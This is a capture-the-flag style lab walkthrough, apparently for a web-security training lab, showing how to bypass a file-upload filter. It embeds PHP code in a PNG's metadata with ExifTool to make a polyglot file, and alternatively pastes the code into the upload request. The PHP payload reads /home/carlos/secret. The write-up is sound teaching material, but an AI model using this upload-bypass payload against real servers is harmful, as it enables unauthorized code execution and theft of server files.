Login with given credentials.

Our Aim is to read content of /home/carlos/secret

Lets upload a random image, intercept the request to understand how webserver is working.

Make sure to check images option from filter setting.

After uploading image, in burpsuite, select the POST request to /my-account/avatar which is used to upload this image file, send this request to repeater using CTRL + R

In the website, click on Back to my account. We can see, our uploaded image is successfully loaded.

Again in Burpsuite, select the GET request to /files/avatar/images.png which is used to load the uploaded image.
Send this request to repeater.

Now we know how the server is handling the request.

Key thing to note.
If we directly upload .php file then it is filtered out
But if we change the image.png to image.php (just change the extension of image from png to php) then it is openly accepted.
From this we can get idea, server is not focusing on the extension of file for filtering, rather it is focusing on metadata of the file like(specific sequence of bytes in their header or footer.)

To bypass this filter, we will use ExifTool to create a polyglot png file containing malicious code within its metadata.

Metadata of image.png.
Now we will add comment field in metadata of this image.

exiftool -Comment="<?php echo 'FLAG to the RIGHT' . file_get_contents('/home/carlos/secret') . 'Flag to the LEFT' ; ?>" image.png -o virusimage.php

In this above snippet.
-Comment flag is used add comment field in metadata.
image.png is the file we want to edit
-o flag is used to output the image (in this case we are outputing to virusimage.php)

Lets understand about the php code.

<?php echo ‘FLAG to the RIGHT’ . file_get_contents(‘/home/carlos/secret’) . ‘Flag to the LEFT’ ; ?>

This php code uses file_get_contents method to get the content of secret file which is then echoed out using echo constructor.

we are adding‘FLAG to the RIGHT’ and ‘Flag to the LEFT’ option to make the flag visible to us.

After using the exiftool to edit the file, when we check the image.php ‘s metadata, we can see this same to the png file with only change is addition of comment field.

Now we can upload this malicious php file.

Now lets execute this php file.
To execute this php file, we will the previous GET request which was used to load the image.png file.

add virusimage.php in the GET request and send this request.
In the response we can see the content of secret flag between ‘FLAG to the RIGHT’ and ‘Flag to the LEFT’

Which complets the lab.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

SECOND METHOD

For second method, select the initial POST request which was used to upload the image.png file.

In this request we are going to remove the actual content of the image , paste the malicious php code.

Then send this request, file should be successfully upload.

Same like before change the GET request file name and we should get the content of file in the response.